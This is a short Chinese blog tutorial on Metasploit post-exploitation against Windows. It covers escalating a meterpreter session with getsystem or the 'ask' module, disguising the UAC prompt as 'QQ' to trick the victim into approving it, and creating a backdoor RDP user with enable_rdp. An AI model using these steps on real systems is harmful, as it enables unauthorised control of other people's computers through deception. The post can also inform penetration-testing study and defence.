后渗透之创建新用户(windows平台)

本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关

第一步:先确定自己的权限是不是系统权限

  如果你得到meterpreter之后,不是系统权限,那么就不能创建新的用户,到后面你就会得到一个权限不足的提示。

 如下图

  

 

 那就先查看自己的权限,getuid

 

 

 我这个可能不是系统的权限,就需要进行提权,输入 getsystem

 很不幸,如果执行之后报错

 

  那就需要再换一个方法,输入bg,进入后台管理模式,并且记住这个session 1

  

 

  然后这里还需要用到 exploit/windows/local/ask

    

 

 看看它的选项 options

 

  这里的ip是监听机的ip, 我原来的session是1,而且端口是7777

  只需要设置 set session 1和 set lport 7777即可

    

 

 然后run,然后靶机会有个弹窗需要你确认,点击是即可(可能你觉得这个弹窗很低级,一般人谁会去点这个,但是刚才的设置里面是有一个filename选项的,它可以替换成任意的内容,比如QQ,这样的话,你点击的概率会大大提高)

   

 

 之后返回的meterpreter就是系统权限了

 

第二步:创建一个新的用户

 如果你输入命令 run getgui -u 用户名 -p 密码,不能创建的话,如下图 

 

 就用 run post/windows/manage/enable_rdp USERNAME=用户名 PASSWORD=密码,这个指令更加稳定,下图是执行成功了

 

  去靶机上面查看,Win+R输入netplwiz,发现成功创建!

       

 

 

 

 

 

 

 

 

   

 

posted @ 2022-11-27 16:26  reweber  阅读(421)  评论(0)    收藏  举报